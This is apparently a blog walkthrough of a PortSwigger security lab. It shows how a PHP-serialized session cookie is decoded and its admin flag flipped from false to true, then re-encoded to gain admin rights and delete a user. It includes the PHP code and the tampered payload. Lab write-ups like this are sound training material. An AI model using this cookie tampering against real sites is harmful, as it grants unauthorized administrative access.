Introduction
Today in this post I am going to share my Walkthrough for PortSwigger Lab (Modifying serialized objects) . In this lab after login we will find out our cookie which is php serialized then we will modify the cookie in such a way that we become admin . Further we will delete user carlos to solve the lab.
Objective
This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete Carlos’s account.
You can log in to your own account using the following credentials: wiener:peter
Detection
login with credentials given to us wiener:peter .
As we can see our session has been created .
After decoding the cookie , we can see php serialization . Lets write a php code to un-serialize the value.
Exploitation
Php code used to unserialize the cookie:-
<?php$strng='O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}';$uns = unserialize($strng);
var_dump($uns);
?>
we can see there is an admin parameter which is set to false , we need to modify the parameter to true . For doing that we need to know few things in php , like 0 is boolean false and 1 is boolean true. So change the parameter of b from 0 to 1.
<?php$strng='O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}';$uns = unserialize($strng);
var_dump($uns);$finpay= 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}';
var_dump(unserialize($finpay));
?>
Now we can see admin is true (2) rather then false as in the original cookie (1).
Base64 encode then url encode this payload .
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}
Paste that encoded value in session and refresh the page.
We can see an Admin panel thus we are admin now .
To complete this lab delete user Carlos’s account.
